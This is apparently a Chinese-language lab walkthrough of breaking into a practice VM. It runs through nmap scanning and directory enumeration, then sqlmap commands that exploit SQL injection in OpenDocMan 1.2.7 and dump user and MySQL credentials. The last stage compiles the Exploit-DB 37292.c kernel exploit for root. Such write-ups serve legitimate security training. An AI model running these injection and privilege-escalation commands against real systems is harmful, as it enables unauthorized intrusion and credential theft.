文章目录

一、基础信息

二、信息收集

三、漏洞探测

四、提权

---

一、基础信息

Kali IP:  192.168.20.146

靶机IP：192.168.20.152

二、信息收集

nmap -sS -sV -p- -A 192.168.20.152

开放了22、80、6667等端口

22端口：openssh 6.6.1p1

80端口：apache httpd 2.4.7

6667端口： irc ngircd

访问一下80端口

识别到cms为：drupal 7，后台编程语言：php 5.5.9

页面website处有一个链接，查看源码可查看到，拼接地址进行跳转

http://192.168.20.152/jabc/

页面处没有获取到更多信息，扫描一下当前目录

dirsearch -u http://192.168.20.152/jabc/ -x 403

有robots文件，将robots文件路径保存下，然后用dirb跑一下

下面看到能够访问到疑似登陆界面的路径，访问一下

http://192.168.20.152/jabc/?q=user

但是这里尝试了爆破密码和sql注入都没结果

三、漏洞探测

于是尝试用awvs扫描一下，发现了漏洞信息

但是命令执行并没有成功利用，可能是我方式不对？

继续点击页面，点击document页面时发现了不一样的地方，页面无显示，但是选中时发现了隐藏信息

拼接新路径访问:http://192.168.20.152/jabcd0cs/

底部是：OpenDocMan 1.2.7，该页面存在OpenDocMan框架，查看是否存在EXP！

Awvs扫描结果

显示有一些xss漏洞

Kali搜索：searchsploit OpenDocMan 1.2.7

提示可能有sql注入，根据提示路径尝试sqlmap爆破

sqlmap -u "http://192.168.20.152/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk=3 --level=5  --dbs

爆出数据库用户名密码

sqlmap -u "http://192.168.20.152/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk=3 --level=5 -D jabcd0cs -T odm_user -C id,email,password --dump

这里爆出两个用户

webmin： webmin1980

guest： guest

这里也可以爆mysql数据库的账户信息，最终可得到mysql账户密码为：root/toor

有了账户密码，直接尝试ssh登录

四、提权

1、Sudo与suid位提权方式经测试无法利用

2、计划任务没有特别的

find /etc/*cron* -type f -ls 2>/dev/null -exec cat {} \; > /tmp/cron.txt

grep '\*' /tmp/cron.txt

3、查看当前运行的服务和开放的端口情况，mysql不是以root权限运行，无法udf提权

Netstat -anpt

Ps -aux | grep mysql

4、查看内核版本

Uname -a ；cat /etc/*release

Linux 3.13 Ubuntu 14.04.4

searchsploit Ubuntu 14.04

 

locate linux/local/37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root
python -m http.server 8091
gcc 37292.c -o tiquan
Chmod +x tiquan

此外还有其他漏洞利用和提权方式，可自行参考其他师傅wp